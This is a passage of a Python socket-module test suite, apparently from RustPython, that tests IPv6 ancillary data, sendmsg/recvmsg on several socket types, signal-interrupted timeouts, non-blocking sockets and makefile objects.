def testRecvTrafficClassAndHopLimit(self):
# Test receiving traffic class and hop limit as ancillary data.
self.checkTrafficClassAndHopLimit(ancbufsize=10240)
@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
# Test receiving traffic class and hop limit, using
# CMSG_SPACE() to calculate buffer size.
self.checkTrafficClassAndHopLimit(
ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)
@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
# Test setting traffic class and hop limit on outgoing packet,
# and receiving them at the other end.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
# Try to send ancillary data with first item one byte too
# long. Fall back to sending with correct size if this fails,
# and check that second item was handled correctly.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
try:
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
except OSError as e:
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space, which should be too small to contain the ancillary
# data header (if ancbufsize is None, pass no second argument
# to recvmsg()). Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and no ancillary data is
# returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
args = () if ancbufsize is None else (ancbufsize,)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), *args)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no ancillary
# buffer size is provided.
self.checkHopLimitTruncatedHeader(ancbufsize=None,
# BSD seems to set
# MSG_CTRUNC only if an item
# has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc0(self):
# Check that no ancillary data is received when ancillary
# buffer size is zero.
self.checkHopLimitTruncatedHeader(ancbufsize=0,
ignoreflags=socket.MSG_CTRUNC)
@testSingleCmsgTrunc0.client_skip
def _testSingleCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=1)
@testSingleCmsgTrunc1.client_skip
def _testSingleCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc2Int(self):
self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
@testSingleCmsgTrunc2Int.client_skip
def _testSingleCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncLen0Minus1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
@testSingleCmsgTruncLen0Minus1.client_skip
def _testSingleCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncInData(self):
# Test truncation of a control message inside its associated
# data. The message may be returned with its data truncated,
# or not returned at all.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertLess(len(cmsg_data), SIZEOF_INT)
@testSingleCmsgTruncInData.client_skip
def _testSingleCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space, which should be large enough to
# contain the first item, but too small to contain the header
# of the second. Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and only one ancillary
# data item is returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
# Try the above test with various buffer sizes.
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc0(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
ignoreflags=socket.MSG_CTRUNC)
@testSecondCmsgTrunc0.client_skip
def _testSecondCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
@testSecondCmsgTrunc1.client_skip
def _testSecondCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc2Int(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
2 * SIZEOF_INT)
@testSecondCmsgTrunc2Int.client_skip
def _testSecondCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncLen0Minus1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(0) - 1)
@testSecondCmsgTruncLen0Minus1.client_skip
def _testSecondCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
    def testSecondCmsgTruncInData(self):
# Test truncation of the second of two control messages inside
# its associated data.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertLess(len(cmsg_data), SIZEOF_INT)
self.assertEqual(ancdata, [])
    @testSecondCmsgTruncInData.client_skip
    def _testSecondCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Derive concrete test classes for different socket types.
class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDP6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, TCPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, SCTPStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
            super().testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
            super().testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, UnixStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
SendrecvmsgUnixStreamTestBase):
pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
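# A minimal sketch of the pattern the classes below exercise.  It is
# illustrative only, is never invoked by the test runner, and assumes a
# POSIX platform with signal.setitimer(): install a SIGALRM handler that
# raises, schedule an alarm, and expect the handler's exception to
# propagate out of the blocking socket call it interrupts.
def _interrupted_recv_sketch():
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    old_handler = signal.signal(signal.SIGALRM, lambda signum, frame: 1 / 0)
    try:
        sock.settimeout(4.0)
        signal.setitimer(signal.ITIMER_REAL, 0.05)
        try:
            sock.recv(1024)        # interrupted by SIGALRM before the timeout
        except ZeroDivisionError:
            pass                   # the handler's exception propagated
    finally:
        signal.setitimer(signal.ITIMER_REAL, 0)
        signal.signal(signal.SIGALRM, old_handler)
        sock.close()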
class InterruptedTimeoutBase(unittest.TestCase):
# Base class for interrupted send/receive tests. Installs an
# empty handler for SIGALRM and removes it on teardown, along with
# any scheduled alarms.
def setUp(self):
super().setUp()
orig_alrm_handler = signal.signal(signal.SIGALRM,
lambda signum, frame: 1 / 0)
self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
# Timeout for socket operations
timeout = 4.0
# Provide setAlarm() method to schedule delivery of SIGALRM after
# given number of seconds, or cancel it if zero, and an
# appropriate time value to use. Use setitimer() if available.
if hasattr(signal, "setitimer"):
alarm_time = 0.05
def setAlarm(self, seconds):
signal.setitimer(signal.ITIMER_REAL, seconds)
else:
# Old systems may deliver the alarm up to one second early
alarm_time = 2
def setAlarm(self, seconds):
signal.alarm(seconds)
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
# Test interrupting the recv*() methods with signals when a
# timeout is set.
def setUp(self):
super().setUp()
self.serv.settimeout(self.timeout)
def checkInterruptedRecv(self, func, *args, **kwargs):
        # Check that func(*args, **kwargs) is interrupted by the alarm
        # signal: the ZeroDivisionError raised by the SIGALRM handler
        # must propagate out of the call.
try:
self.setAlarm(self.alarm_time)
with self.assertRaises(ZeroDivisionError) as cm:
func(*args, **kwargs)
finally:
self.setAlarm(0)
def testInterruptedRecvTimeout(self):
self.checkInterruptedRecv(self.serv.recv, 1024)
def testInterruptedRecvIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))
def testInterruptedRecvfromTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom, 1024)
def testInterruptedRecvfromIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))
@requireAttrs(socket.socket, "recvmsg")
def testInterruptedRecvmsgTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg, 1024)
@requireAttrs(socket.socket, "recvmsg_into")
def testInterruptedRecvmsgIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
ThreadSafeCleanupTestCase,
SocketListeningTestMixin, TCPTestBase):
# Test interrupting the interruptible send*() methods with signals
# when a timeout is set.
def setUp(self):
super().setUp()
self.serv_conn = self.newSocket()
self.addCleanup(self.serv_conn.close)
# Use a thread to complete the connection, but wait for it to
# terminate before running the test, so that there is only one
# thread to accept the signal.
cli_thread = threading.Thread(target=self.doConnect)
cli_thread.start()
self.cli_conn, addr = self.serv.accept()
self.addCleanup(self.cli_conn.close)
cli_thread.join()
self.serv_conn.settimeout(self.timeout)
def doConnect(self):
self.serv_conn.connect(self.serv_addr)
def checkInterruptedSend(self, func, *args, **kwargs):
        # Check that func(*args, **kwargs), run in a loop, is interrupted
        # by the alarm signal: the ZeroDivisionError raised by the SIGALRM
        # handler must propagate out of the call.
try:
with self.assertRaises(ZeroDivisionError) as cm:
while True:
self.setAlarm(self.alarm_time)
func(*args, **kwargs)
finally:
self.setAlarm(0)
# Issue #12958: The following tests have problems on OS X prior to 10.7
@unittest.skip("TODO: RUSTPYTHON, plistlib")
@support.requires_mac_ver(10, 7)
def testInterruptedSendTimeout(self):
self.checkInterruptedSend(self.serv_conn.send, b"a"*512)
@unittest.skip("TODO: RUSTPYTHON, plistlib")
@support.requires_mac_ver(10, 7)
def testInterruptedSendtoTimeout(self):
# Passing an actual address here as Python's wrapper for
# sendto() doesn't allow passing a zero-length one; POSIX
# requires that the address is ignored since the socket is
# connection-mode, however.
self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
self.serv_addr)
@unittest.skip("TODO: RUSTPYTHON, plistlib")
@support.requires_mac_ver(10, 7)
@requireAttrs(socket.socket, "sendmsg")
def testInterruptedSendmsgTimeout(self):
self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
class TCPCloserTest(ThreadedTCPSocketTest):
def testClose(self):
conn, addr = self.serv.accept()
conn.close()
sd = self.cli
read, write, err = select.select([sd], [], [], 1.0)
self.assertEqual(read, [sd])
self.assertEqual(sd.recv(1), b'')
# Calling close() many times should be safe.
conn.close()
conn.close()
def _testClose(self):
self.cli.connect((HOST, self.port))
time.sleep(1.0)
class BasicSocketPairTest(SocketPairTest):
def __init__(self, methodName='runTest'):
SocketPairTest.__init__(self, methodName=methodName)
def _check_defaults(self, sock):
self.assertIsInstance(sock, socket.socket)
if hasattr(socket, 'AF_UNIX'):
self.assertEqual(sock.family, socket.AF_UNIX)
else:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def _testDefaults(self):
self._check_defaults(self.cli)
def testDefaults(self):
self._check_defaults(self.serv)
def testRecv(self):
msg = self.serv.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.send(MSG)
def testSend(self):
self.serv.send(MSG)
def _testSend(self):
msg = self.cli.recv(1024)
self.assertEqual(msg, MSG)
class NonBlockingTCPTests(ThreadedTCPSocketTest):
def __init__(self, methodName='runTest'):
self.event = threading.Event()
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def assert_sock_timeout(self, sock, timeout):
self.assertEqual(self.serv.gettimeout(), timeout)
blocking = (timeout != 0.0)
self.assertEqual(sock.getblocking(), blocking)
if fcntl is not None:
# When a Python socket has a non-zero timeout, it's switched
# internally to a non-blocking mode. Later, sock.sendall(),
# sock.recv(), and other socket operations use a select() call and
            # handle EWOULDBLOCK/EAGAIN on all socket operations. That's how
# timeouts are enforced.
fd_blocking = (timeout is None)
flag = fcntl.fcntl(sock, fcntl.F_GETFL, os.O_NONBLOCK)
self.assertEqual(not bool(flag & os.O_NONBLOCK), fd_blocking)
def testSetBlocking(self):
# Test setblocking() and settimeout() methods
self.serv.setblocking(True)
self.assert_sock_timeout(self.serv, None)
self.serv.setblocking(False)
self.assert_sock_timeout(self.serv, 0.0)
self.serv.settimeout(None)
self.assert_sock_timeout(self.serv, None)
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
self.serv.settimeout(10)
self.assert_sock_timeout(self.serv, 10)
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
def _testSetBlocking(self):
pass
@support.cpython_only
def testSetBlocking_overflow(self):
# Issue 15989
import _testcapi
if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
self.skipTest('needs UINT_MAX < ULONG_MAX')
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.serv.setblocking(_testcapi.UINT_MAX + 1)
self.assertIsNone(self.serv.gettimeout())
_testSetBlocking_overflow = support.cpython_only(_testSetBlocking)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'test needs socket.SOCK_NONBLOCK')
@support.requires_linux_version(2, 6, 28)
def testInitNonBlocking(self):
# create a socket with SOCK_NONBLOCK
self.serv.close()
self.serv = socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
self.assert_sock_timeout(self.serv, 0)
def _testInitNonBlocking(self):
pass
def testInheritFlagsBlocking(self):
        # bpo-7995: when accept() is called on a listening socket with a
        # timeout while the default timeout is None, the resulting socket
        # must be blocking.
with socket_setdefaulttimeout(None):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testInheritFlagsBlocking(self):
self.cli.connect((HOST, self.port))
def testInheritFlagsTimeout(self):
        # bpo-7995: when accept() is called on a listening socket with a
        # timeout while a default timeout is set, the resulting socket
        # must inherit the default timeout.
default_timeout = 20.0
with socket_setdefaulttimeout(default_timeout):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertEqual(conn.gettimeout(), default_timeout)
def _testInheritFlagsTimeout(self):
self.cli.connect((HOST, self.port))
def testAccept(self):
# Testing non-blocking accept
self.serv.setblocking(0)
# connect() didn't start: non-blocking accept() fails
start_time = time.monotonic()
with self.assertRaises(BlockingIOError):
conn, addr = self.serv.accept()
dt = time.monotonic() - start_time
self.assertLess(dt, 1.0)
self.event.set()
read, write, err = select.select([self.serv], [], [], MAIN_TIMEOUT)
if self.serv not in read:
self.fail("Error trying to do accept after select.")
# connect() completed: non-blocking accept() doesn't block
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testAccept(self):
# don't connect before event is set to check
# that non-blocking accept() raises BlockingIOError
self.event.wait()
self.cli.connect((HOST, self.port))
def testRecv(self):
# Testing non-blocking recv
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
conn.setblocking(0)
        # the client hasn't sent data yet: non-blocking recv() fails
with self.assertRaises(BlockingIOError):
msg = conn.recv(len(MSG))
self.event.set()
read, write, err = select.select([conn], [], [], MAIN_TIMEOUT)
if conn not in read:
self.fail("Error during select call to non-blocking socket.")
        # the client has now sent data: non-blocking recv() doesn't block
msg = conn.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.connect((HOST, self.port))
# don't send anything before event is set to check
# that non-blocking recv() raises BlockingIOError
self.event.wait()
# send data: recv() will no longer block
self.cli.sendall(MSG)
class FileObjectClassTestCase(SocketConnectedTest):
"""Unit tests for the object returned by socket.makefile()
self.read_file is the io object returned by makefile() on
the client connection. You can read from this file to
get output from the server.
self.write_file is the io object returned by makefile() on the
server connection. You can write to this file to send output
to the client.
"""
bufsize = -1 # Use default buffer size
encoding = 'utf-8'
errors = 'strict'
newline = None
read_mode = 'rb'
read_msg = MSG
write_mode = 'wb'
write_msg = MSG
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def setUp(self):
self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
threading.Event() for i in range(4)]
SocketConnectedTest.setUp(self)
self.read_file = self.cli_conn.makefile(
self.read_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def tearDown(self):
self.serv_finished.set()
self.read_file.close()
self.assertTrue(self.read_file.closed)
self.read_file = None
SocketConnectedTest.tearDown(self)
def clientSetUp(self):
SocketConnectedTest.clientSetUp(self)
self.write_file = self.serv_conn.makefile(
self.write_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def clientTearDown(self):
self.cli_finished.set()
self.write_file.close()
self.assertTrue(self.write_file.closed)
self.write_file = None
SocketConnectedTest.clientTearDown(self)
def testReadAfterTimeout(self):
# Issue #7322: A file object must disallow further reads
# after a timeout has occurred.
self.cli_conn.settimeout(1)
self.read_file.read(3)
# First read raises a timeout
self.assertRaises(socket.timeout, self.read_file.read, 1)
# Second read is disallowed
with self.assertRaises(OSError) as ctx:
